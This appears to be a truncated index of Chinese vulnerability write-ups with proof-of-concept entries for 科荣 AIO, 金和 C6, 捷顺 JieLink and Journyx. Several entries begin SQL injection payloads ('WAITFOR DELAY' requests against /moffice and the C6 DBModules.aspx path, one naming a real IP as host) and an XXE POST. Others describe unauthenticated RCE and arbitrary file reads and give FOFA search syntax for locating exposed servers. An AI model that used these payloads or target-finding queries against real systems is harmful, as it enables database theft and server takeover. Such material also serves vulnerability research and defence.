K1-5科荣-AIO-SQL 漏洞复现: payload: GET /moffice?op=showWorkPlan&planId=1';WAITFOR+DELAY+'0:0:5'--&sid=1 HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (X
K1-4科荣-AIO-SQL 漏洞描述: 科荣AIO moffice 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 影响版本: 科荣
K1-3科荣-AIO-任意文件读取 漏洞描述: 科荣AIO ReadFile 接口处存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 影响版本: 科荣-AIO 网站图片: 网络测绘: fofa语法: 钟馗之眼
K1-2科荣-AIO-任意文件读取 漏洞描述: 科荣AIO ReportServlet 接口处存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 影响版本: 科荣-AIO 网站图片: 网络测绘: fofa语法:
K1-1科荣-AIO-RCE 漏洞描述: 科荣AIO UtilServlet 接口处存远程代码执行漏洞,未经身份验证的攻击者可通过该漏洞远程执行恶意代码,写入后门文件,可获取服务器权限。 影响版本: 科荣-AIO 网站图片: 网络测绘: fofa语法: 钟馗之眼:“changeAccount('80
J38-1金和-C6协同管理平台-SQL 漏洞复现: payload: GET /C6/JHSoft.Web.WorkFlat/DBModules.aspx/?interfaceID=1;WAITFOR+DELAY+'0:0:5'-- HTTP/1.1 Host: 123.57.26.236 Use
J36-3捷顺-智能终端操作平台-InformationLeakage 漏洞描述: JieLink+智能终端操作平台ParkOutRecord接口处存在敏感信息泄露漏洞,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失 漏洞复现: payload: GET
J36-2捷顺-智能终端操作平台-InformationLeakage 漏洞描述: JieLink+智能终端操作平台ParkCommon接口处存在敏感信息泄露漏洞,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。 漏洞复现: payload: GET /R
J36-1捷顺-智能终端操作平台-InformationLeakage 漏洞描述: JieLink+智能终端操作平台/report/ParkChargeRecord/GetDataList接口处存在敏感信息泄露漏洞,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏
J35-2Journyx-项目管理软件-XXE fofa语法: “Journyx” 漏洞复现: payload: POST /jtcgi/soap_cgi.pyc HTTP/1.1 Host: Accept: */* Content-Type: application/x-www-form-url
